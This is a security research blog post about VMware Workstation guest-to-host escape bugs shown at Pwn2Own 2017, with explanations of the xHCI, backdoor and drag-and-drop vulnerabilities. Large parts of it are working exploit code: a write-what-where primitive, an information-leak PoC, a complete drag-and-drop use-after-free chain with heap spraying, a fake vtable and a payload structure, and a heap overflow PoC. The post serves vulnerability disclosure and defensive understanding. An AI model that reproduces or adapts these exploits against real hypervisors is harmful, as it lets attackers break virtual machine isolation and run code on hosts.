A bunch of Red Pills: VMware Escapes


by Marco Grassi, Azureyang, Jackyxty

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for cloud, and VMware Workstation and Fusion for Desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to great lengths to offer this isolation, especially in the ESXi product, where virtual machines belonging to different actors can run on the same hardware. Strong isolation is therefore of paramount importance.

Pwn2Own recently introduced a “Virtualization” category, and VMware has been among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from the guest to the host, starting from an unprivileged account and ending with code execution on the host, breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how does VMware work?

In a nutshell, it usually relies on CPU and memory hardware virtualization technologies (although they are not strictly required), so a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and memory. It also requires a lot of other hardware to work properly and be useful.

This point is very important, because it constitutes one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task. This becomes obvious when reading the datasheet that describes the hardware/software interface of any PC hardware device.

VMware traps I/O accesses to the virtual device and must emulate all those low-level operations correctly. Since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore, if you have ever used VMware you might have noticed its copy-and-paste and shared-folder capabilities. How are those implemented?

To summarize, in this blog post we will cover several bugs: some in the “backdoor” functionality that supports “extra” services such as copy and paste (C&P), and one in a virtualized device.

Although many VMware blog posts and presentations have been released recently, we felt the need to write our own for the following reasons:

  • First, no one has ever described our Pwn2Own bugs correctly, so we want to shed light on them.
  • Second, some of the published resources lack details or code.

So we hope you will enjoy our blogpost!

We will begin with some background information to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components. We will highlight only the most important ones, since the VMware architecture has already been discussed extensively elsewhere.

  • VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs run and handles all the tasks that cannot be performed from ring 3 on the host.
  • vmnat: vmnat is responsible for network packet handling, since VMware offers advanced functionality such as NAT and virtual networks.
  • vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles many tasks that are relevant for this blog post, including much of the device emulation and the handling of backdoor requests. Exploiting the chains we present results in code execution on the host in the context of vmware-vmx.

Backdoor

The so-called backdoor is not actually a “backdoor”; it is simply a mechanism implemented in VMware for guest-to-host and host-to-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

At the lowest level, the backdoor consists of two I/O ports, 0x5658 and 0x5659: the first is used for “traditional” communication, the second for “high bandwidth” communication.

The guest issues in/out instructions on those ports following a register convention, and in this way it is able to communicate with VMware running on the host.

The hypervisor will trap and service the request.
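
To make the register convention concrete, here is a minimal sketch of how a guest could prepare a low-bandwidth backdoor call. The magic value, port numbers and the GETVERSION command number are the ones published in open-vm-tools; the bdoor_regs structure, the bdoor_prepare and bdoor_call helpers and the BDOOR_IN_GUEST guard macro are names we made up for illustration. The in instruction is compiled only when that guard is defined, because outside a VMware guest it would simply fault in ring 3.

```c
#include <stdint.h>
#include <string.h>

/* Constants as published in open-vm-tools (backdoor_def.h). */
#define BDOOR_MAGIC          0x564D5868u  /* "VMXh" */
#define BDOOR_PORT           0x5658u      /* "traditional" port */
#define BDOORHB_PORT         0x5659u      /* "high bandwidth" port */
#define BDOOR_CMD_GETVERSION 10u

/* Hypothetical container for the registers involved in one call. */
typedef struct {
    uint32_t eax, ebx, ecx, edx;
} bdoor_regs;

/* Fill the registers the way the convention expects:
 * EAX = magic, EBX = command parameter, ECX = command, DX = port. */
static bdoor_regs bdoor_prepare(uint32_t cmd, uint32_t param)
{
    bdoor_regs r;
    memset(&r, 0, sizeof r);
    r.eax = BDOOR_MAGIC;
    r.ebx = param;
    r.ecx = cmd;
    r.edx = BDOOR_PORT;
    return r;
}

#if defined(BDOOR_IN_GUEST) && defined(__GNUC__) && \
    (defined(__i386__) || defined(__x86_64__))
/* Only meaningful inside a VMware guest: the hypervisor traps the
 * port access and returns its answer in the same registers. */
static void bdoor_call(bdoor_regs *r)
{
    __asm__ volatile("inl %%dx, %%eax"
                     : "+a"(r->eax), "+b"(r->ebx),
                       "+c"(r->ecx), "+d"(r->edx)
                     :
                     : "memory");
}
#endif
```

Inside a guest, one would call bdoor_prepare(BDOOR_CMD_GETVERSION, 0) followed by bdoor_call() and then inspect the returned registers. The higher-level protocols mentioned in this post are layered on top of calls of this kind.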

On top of this low-level mechanism, VMware implemented some more convenient high-level protocols. We encourage you to check the open-vm-tools repository to discover them; since they have been covered extensively elsewhere, we will not spend much time on the details.
To mention just a few of those higher-level protocols: drag and drop, copy and paste, and guestrpc.

The fundamental points to remember are:

  • It’s a guest-host interface that we can use.
  • It exposes complex services and functionality.
  • A lot of this functionality can be used from ring 3 in the guest VM.

xHCI

xHCI (eXtensible Host Controller Interface) is a specification by Intel for a USB host controller (normally implemented in hardware on a regular PC) that supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it’s often present:

00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, as with many hardware devices, takes place through the PCI memory space and the memory-mapped I/O space.

This very low-level interface is the one used by the OS kernel driver to schedule USB work, receive data, and perform all other USB-related tasks.

The specification alone is more than 600 pages long, so it is no surprise that this piece of hardware and its interface are very complex. And the specification only covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. It is a very complex and error-prone task, as we will see soon.

To talk directly to hardware (and consequently also to virtualized hardware), you often need to run in ring 0 in the guest. That’s why, as you will see in the next paragraphs, we used a Windows kernel LPE inside the VM.

Mitigations

VMware ships with the “baseline” mitigations that are expected in modern software, such as ASLR and stack cookies.

More advanced Windows mitigations, such as CFG (Microsoft’s version of Control Flow Integrity) and others, are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeted VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.

The following vulnerabilities were identified and analyzed:

  • CVE-2017-4904 (critical): xHCI uninitialized stack value leading to arbitrary code execution
  • CVE-2017-4905 (moderate): Backdoor uninitialized memory read leading to information disclosure

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability in the emulated xHCI device. It is triggered when changes to a Device Context are written back to guest physical memory.

The xHCI reports status information to system software through the “Device Context” structure. The address of each Device Context is stored in the DCBAA (Device Context Base Address Array), whose own address is held in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and the DCBAA reside in physical RAM. The xHCI device keeps an internal cache of the Device Context and only updates the copy in physical memory when something changes. To perform this update, the virtual machine monitor maps the guest physical memory containing the Device Context into the address space of the monitor process and then writes to it. However, the mapping can fail, and in that case the result variable is left untouched. The code does not guard against this and directly uses the result as the destination address of a memory write, which gives us an uninitialized variable vulnerability.
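
The pattern described above can be modelled in a few lines of C. This is a minimal sketch of the bug class and not the vmware-vmx code: guest_ram, map_guest_phys, update_ctx_buggy and update_ctx_fixed are hypothetical names, and the stale parameter stands in for whatever an earlier call left in the uninitialized stack slot.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define GUEST_RAM_SIZE 0x1000u
static uint8_t guest_ram[GUEST_RAM_SIZE];   /* stand-in for guest physical memory */

/* Hypothetical mapper: on failure it returns 0 and does NOT touch *out. */
static int map_guest_phys(uint64_t gpa, size_t len, void **out)
{
    if (gpa >= GUEST_RAM_SIZE || len > GUEST_RAM_SIZE - gpa)
        return 0;
    *out = &guest_ram[gpa];
    return 1;
}

/* Buggy shape: the return value is ignored, so after a failed mapping
 * the destination is whatever the local variable held before.
 * Returns the address that the device context would be written to. */
static void *update_ctx_buggy(uint64_t gpa, void *stale)
{
    void *dst = stale;              /* models an uninitialized local */
    map_guest_phys(gpa, 32, &dst);  /* result ignored */
    return dst;                     /* real code would write through dst */
}

/* Defensive shape: initialize the pointer and check the mapping result. */
static int update_ctx_fixed(uint64_t gpa, const void *ctx, size_t len)
{
    void *dst = NULL;
    if (!map_guest_phys(gpa, len, &dst))
        return 0;
    memcpy(dst, ctx, len);
    return 1;
}
```

With a valid guest physical address both variants write into guest RAM. With an unmappable one such as 0xffffffffffffffc0, the buggy variant returns the stale pointer as the write destination, while the checked variant refuses to write.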

To trigger this bug, the following steps should be taken:

  1. Issue an “Enable Slot” command to the xHCI. Get the resulting slot number from the Event TRB.
  2. Set the DCBAAP to point to a controlled buffer.
  3. Put an invalid physical address, e.g. 0xffffffffffffffff, into the corresponding slot of the DCBAA buffer.
  4. Issue an “Address Device” command. The xHCI reads the base address of the Device Context from the DCBAA into an internal cache, and that value is a controlled, invalid address.
  5. Issue a “Configure Endpoint” command. The bug triggers when the xHCI updates the corresponding Device Context.
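
The three commands in these steps are all written to the command ring as 16-byte TRBs. The following is a minimal sketch of how such a TRB can be encoded, assuming the layout given in the xHCI specification (TRB type in bits 15:10 of the control word, slot ID in bits 31:24, cycle bit in bit 0). The xhci_trb type and the make_cmd_trb helper are illustrative names and are not the TRB_SET macros used by our exploit.

```c
#include <stdint.h>

/* Command TRB type IDs from the xHCI specification. */
enum {
    TRB_TYPE_ENABLE_SLOT    = 9,
    TRB_TYPE_ADDRESS_DEVICE = 11,
    TRB_TYPE_CONFIGURE_EP   = 12
};

/* A TRB is 16 bytes: 64-bit parameter, 32-bit status, 32-bit control. */
typedef struct {
    uint64_t parameter;
    uint32_t status;
    uint32_t control;
} xhci_trb;

#define TRB_CYCLE       (1u << 0)
#define TRB_BIT9        (1u << 9)  /* BSR for Address Device, DC for Configure Endpoint */
#define TRB_TYPE(t)     (((uint32_t)(t) & 0x3fu) << 10)
#define TRB_SLOT_ID(id) (((uint32_t)(id) & 0xffu) << 24)

/* Build a command TRB. input_ctx_pa is the guest physical address of the
 * Input Context (16-byte aligned); it is ignored by Enable Slot. */
static xhci_trb make_cmd_trb(unsigned type, unsigned slot_id,
                             uint64_t input_ctx_pa, int bit9, int cycle)
{
    xhci_trb trb;
    trb.parameter = input_ctx_pa & ~(uint64_t)0xf;
    trb.status = 0;
    trb.control = TRB_TYPE(type) | TRB_SLOT_ID(slot_id);
    if (bit9)
        trb.control |= TRB_BIT9;
    if (cycle)
        trb.control |= TRB_CYCLE;
    return trb;
}
```

For example, make_cmd_trb(TRB_TYPE_ADDRESS_DEVICE, 1, ctx_pa, 1, 1) describes an Address Device command for slot 1 with bit 9 set, where ctx_pa is a placeholder for the Input Context address.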

The uninitialized variable resides on the stack. Its value can be controlled through the “Configure Endpoint” command, using one of the Endpoint Contexts of the Input Context, which is also placed on the stack. Therefore we control the destination address of the write. The contents to be written come from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context. The result is a write-what-where primitive. By combining it with the info leak vulnerability, we can overwrite function pointers and finally use ROP to achieve arbitrary code execution.

Exploit code

void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground) return;
    playground[0] = 0;

    // Build a DCBAA whose first max_slots entries hold an invalid physical address.
    uint64 *dcbaa = (uint64*)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;

    // Carve an aligned Input Context and command ring out of the same allocation.
    playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context*)playground;

    playground += sizeof(input_context);
    playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;

    // Stage 1: Enable Slot followed by Address Device, so the controller
    // caches the invalid Device Context address read from the DCBAA.
    trb_t *cmd = (trb_t*)cring;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0;

    // Stage 2: Configure Endpoint. The Input Context carries both the value
    // to write ("what") and the stale stack value used as destination ("where").
    cmd = (trb_t*)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0;
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability in the Backdoor callback handler. A buffer is allocated on the stack when backdoor requests are processed, and it should be initialized in the BDOORHB callback. But when an invalid command is requested, the callback fails to clear the buffer properly, so the uninitialized contents of the stack buffer are leaked to the guest. With this bug we can effectively defeat the ASLR of the vmware-vmx process running on the host. The success rate of exploiting this bug is 100%.

Credits to JunMao of Tencent PCManager.

PoC

void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from vmware-vmx stack
    //
    ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}
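
On the host side, the mistake behind this leak can be sketched as follows. This is a simplified model built only from the description above, not decompiled vmware-vmx code: the handler names, the HB_CMD_VALID command ID and the buffer size are assumptions, and the stack_residue parameter stands in for whatever earlier calls left in the uninitialized stack buffer.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HB_BUF_SIZE 64

/* Hypothetical command ID; the real command set is not modelled here. */
enum { HB_CMD_VALID = 0 };

/* Buggy shape: only the valid-command path initializes the buffer,
 * yet the buffer is copied back to the guest on every path. */
static size_t hb_handler_buggy(uint32_t cmd, const uint8_t *stack_residue,
                               uint8_t *guest_dst, size_t guest_len)
{
    uint8_t buf[HB_BUF_SIZE];
    size_t n = guest_len < sizeof buf ? guest_len : sizeof buf;

    memcpy(buf, stack_residue, sizeof buf);  /* models an uninitialized buffer */
    if (cmd == HB_CMD_VALID)
        memset(buf, 0, sizeof buf);          /* the only initializing path */
    memcpy(guest_dst, buf, n);               /* leaks residue on invalid cmd */
    return n;
}

/* Defensive shape: zero the buffer up front and reject invalid commands
 * before anything is copied to the guest. */
static size_t hb_handler_fixed(uint32_t cmd, uint8_t *guest_dst, size_t guest_len)
{
    uint8_t buf[HB_BUF_SIZE] = {0};
    size_t n = guest_len < sizeof buf ? guest_len : sizeof buf;

    if (cmd != HB_CMD_VALID)
        return 0;
    memcpy(guest_dst, buf, n);
    return n;
}
```

In this model, an invalid command makes the buggy handler copy the residue bytes verbatim into the guest buffer, which is the behaviour the PoC relies on when it asks for 0x8000 bytes.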

Behind the scenes of Pwn2Own 2017

Exploiting the UAF bug in VMware Workstation Drag and Drop with a single bug

We found this bug by fuzzing VMware Workstation, and in the last few days of February 2017 we completed a stable exploit chain that uses this bug alone. Unfortunately, the bug was patched in VMware Workstation 12.5.3, released on 9 March 2017. Afterwards we noticed that only a few papers discussed this bug, and VMware did not even assign it a CVE ID. That is a pity, because it is the best bug we have ever seen in VMware Workstation, and VMware patched it quietly. We will now show how to exploit VMware Workstation with this single bug.

Exploit Code

The success rate of this exploit is approximately 100%.

char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }

    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        // Flip the DnD version between 4 and 2 so the host repeatedly
        // allocates and frees the DnD objects.
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }

        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2); //free
        RpcOut_SendOneRaw(call_transport, strlen(call_transport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
                Message_Close(chan); //free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630)   //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);

    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};

            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.

After VMware released 12.5.3, we continued auditing DnD and found another heap overflow bug, similar to CVE-2016-7461. This bug was known to almost every participant in the VMware category of Pwn2Own 2017. Here we present the PoC for this bug.

void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int*)(req3+n) = 3;
    *(int*)(req3+n+4) = 0;
    *(int*)(req3+n+8) = 0x100;
    *(int*)(req3+n+0xc) = 0;
    *(int*)(req3+n+0x10) = 0;
    // allocate buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int*)(req4+n) = 3;
    *(int*)(req4+n+4) = 0;
    *(int*)(req4+n+8) = 0x1000;
    *(int*)(req4+n+0xc) = 0x800;
    *(int*)(req4+n+0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n+0x14+i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}
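
The five integers that the PoC writes after "dnd.transport " can be read as a packet header. Below is a minimal sketch of that header together with the kind of consistency check whose absence would explain the overflow. The field names are modelled on the DnDTransportPacketHeader structure in open-vm-tools and are an assumption about the host side; reasm_state and reasm_accept are hypothetical and only illustrate the bug class. They are not the actual patch.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Five 32-bit fields, in the order the PoC writes them. */
typedef struct {
    uint32_t type;
    uint32_t seq_num;
    uint32_t total_size;    /* size of the whole reassembled message */
    uint32_t payload_size;  /* bytes carried by this packet */
    uint32_t offset;        /* where this packet's bytes belong */
} dnd_v3_hdr;

/* Hypothetical reassembly state kept between packets. */
typedef struct {
    uint8_t *buf;
    uint32_t total_size;
    uint32_t seq_num;
} reasm_state;

/* Returns 1 if the packet was accepted and copied, 0 if rejected. */
static int reasm_accept(reasm_state *st, const dnd_v3_hdr *h,
                        const uint8_t *payload)
{
    if (st->buf == NULL) {
        /* First packet: its total_size decides the allocation. */
        if (h->total_size == 0 || h->offset != 0 ||
            h->payload_size > h->total_size)
            return 0;
        st->buf = malloc(h->total_size);
        if (st->buf == NULL)
            return 0;
        st->total_size = h->total_size;
        st->seq_num = h->seq_num;
    } else if (h->seq_num != st->seq_num ||
               h->total_size != st->total_size) {
        /* A later packet must not redefine the message size. */
        return 0;
    }
    /* The payload must fit inside the buffer that was allocated. */
    if (h->offset > st->total_size ||
        h->payload_size > st->total_size - h->offset)
        return 0;
    if (h->payload_size != 0)
        memcpy(st->buf + h->offset, payload, h->payload_size);
    return 1;
}
```

Fed with the two headers from the PoC, this model accepts the first packet (total size 0x100, no payload) and rejects the second, which claims a total size of 0x1000 and carries 0x800 bytes for a 0x100-byte buffer.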

Conclusions

In this article we presented several VMware bugs leading to guest-to-host virtual machine escapes.
We hope to have demonstrated not only that VM breakouts are possible and real, but also that a determined attacker can achieve several of them, and with good reliability.
We feel that in our industry there is a misconception that if untrusted software runs inside a VM, then we are safe.
Think about the malware industry, which relies heavily on VMs for analysis, or the entire cloud, which basically runs on hypervisors.
A VM certainly is an additional protection layer that raises the bar for an attacker seeking full compromise, so adopting it is very good practice.
But we must not forget that it is essentially just another “layer of sandboxing” which can be bypassed or escaped.
So great care must be taken to secure this security layer as well.